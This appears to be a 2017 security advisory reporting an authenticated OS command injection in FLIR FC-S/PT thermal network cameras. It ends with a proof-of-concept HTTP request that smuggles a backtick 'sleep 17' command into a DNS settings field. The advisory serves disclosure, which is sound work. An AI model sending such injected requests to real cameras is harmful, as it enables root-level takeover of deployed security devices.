60 lines
No EOL
1.9 KiB
Text
60 lines
No EOL
1.9 KiB
Text
FLIR Systems FLIR Thermal Camera FC-S/PT Authenticated OS Command Injection
|
|
|
|
|
|
Vendor: FLIR Systems, Inc.
|
|
Product web page: http://www.flir.com
|
|
Affected version: Firmware version: 8.0.0.64
|
|
Software version: 10.0.2.43
|
|
Release: 1.4.1, 1.4, 1.3.4 GA, 1.3.3 GA and 1.3.2
|
|
FC-Series S (FC-334-NTSC)
|
|
PT-Series (PT-334 200562)
|
|
|
|
Summary: Get the best image detail in challenging imaging environments with the
|
|
FLIR FC-Series S thermal network camera. The award-winning FC-Series S camera
|
|
sets the industry standard for high-quality thermal security cameras, ideal for
|
|
perimeter protection applications. The FC-Series S is capable of replacing multiple
|
|
visible cameras and any additional lighting and infrastructure needed to support
|
|
them.
|
|
|
|
Desc: FLIR FC-S/PT series suffer from an authenticated OS command injection vulnerability.
|
|
This can be exploited to inject and execute arbitrary shell commands as the root user.
|
|
|
|
|
|
Tested on: Linux 2.6.18_pro500-davinci_evm-arm_v5t_le
|
|
Linux 2.6.10_mvl401-davinci_evm-PSP_01_30_00_082
|
|
Nexus Server/2.5.29.0
|
|
Nexus Server/2.5.14.0
|
|
Nexus Server/2.5.13.0
|
|
lighttpd/1.4.28
|
|
PHP/5.4.7
|
|
|
|
|
|
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
|
@zeroscience
|
|
|
|
|
|
Advisory ID: ZSL-2017-5437
|
|
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5437.php
|
|
|
|
|
|
23.03.2017
|
|
|
|
--
|
|
|
|
|
|
PoC request (sleep 17):
|
|
|
|
POST /page/maintenance/lanSettings/dns HTTP/1.1
|
|
Host: TARGET
|
|
Content-Length: 64
|
|
Accept: */*
|
|
Origin: http://TARGET
|
|
X-Requested-With: XMLHttpRequest
|
|
User-Agent: Testingus/1.0
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Referer: http://TARGET/maintenance
|
|
Accept-Language: en-US,en;q=0.8,mk;q=0.6
|
|
Cookie: PHPSESSID=d1eabfdb8db4b95f92c12b8402abc03b
|
|
Connection: close
|
|
|
|
dns%5Bserver1%5D=8.8.8.8&dns%5Bserver2%5D=8.8.4.4%60sleep%2017%60 |